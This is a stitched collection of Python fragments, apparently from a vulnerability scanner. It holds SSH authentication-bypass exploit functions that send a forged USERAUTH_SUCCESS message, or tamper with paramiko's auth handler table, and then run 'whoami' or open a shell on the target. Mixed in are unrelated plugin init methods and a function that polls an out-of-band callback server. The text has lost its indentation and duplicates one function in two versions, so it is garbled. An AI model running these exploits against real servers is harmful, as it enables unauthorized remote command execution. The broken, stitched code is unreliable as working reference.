def password_auth_bypass_test(hostname, port):
bufsize = 2048
command = 'whoami'
sock = socket.socket()
try:
sock.connect((hostname, int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
client = transport.open_session(timeout=10)
client.exec_command(command)
stdout = client.makefile("rb", bufsize)
stderr = client.makefile_stderr("rb", bufsize)
cmd_out = stdout.read().decode() + stderr.read().decode()
print(cmd_out)
return True if 'root' in cmd_out else False
except paramiko.SSHException:
logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
return False
except socket.error:
logger.debug("Unable to connect.")
return False
def init(self):
debug_msg = "[PLUGIN] file_record plugin init..."
logger.debug(debug_msg)
logger.info("[PLUGIN] The data will be recorded in {}".format(self.filename))
if os.path.exists(self.filename):
raise Exception("The {} has existed".format(self.filename))
self.file = open(self.filename, 'a+')
def poll(self):
count = 3
result = []
while count:
try:
url = f"https://{self.server}/poll?id={self.correlation_id}&secret={self.secret}"
res = self.session.get(url, headers=self.headers,
verify=False).json()
aes_key, data_list = res['aes_key'], res['data']
for i in data_list:
decrypt_data = self.decrypt_data(aes_key, i)
result.append(decrypt_data)
return result
except Exception as e:
logger.debug(e)
count -= 1
time.sleep(1)
continue
return []
def fake_key_bypass_test(hostname, port, username='******', keyfile=None, command='whoami'):
try:
if keyfile is None:
keyfile = os.path.join(os.environ['HOME'], '.ssh', 'id_rsa')
paramiko.auth_handler.AuthHandler._server_handler_table.update(
{paramiko.common.MSG_USERAUTH_REQUEST: auth_accept})
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname, port=int(port), username=username, password="", pkey=None, key_filename=keyfile)
stdin, stdout, stderr = client.exec_command(command)
cmd_output = stdout.read()
client.close()
return True if cmd_output == 'root' else False
except FileNotFoundError:
logger.debug("Generate a keyfile for tool to bypass remote/local server credentials.")
return False
except paramiko.SSHException:
logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
return False
except socket.error:
logger.debug("Unable to connect.")
return False
def password_auth_bypass_test(hostname, port):
sock = socket.socket()
try:
sock.connect((hostname, int(port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
client = transport.open_session(timeout=10)
client.invoke_shell()
return True
except paramiko.SSHException as e:
logger.debug(
"TCPForwarding disabled on remote server can't connect. Not Vulnerable"
)
return False
except socket.error:
logger.debug("Unable to connect.")
return False
def init(self):
debug_msg = "[PLUGIN] html_report plugin init..."
logger.debug(debug_msg)
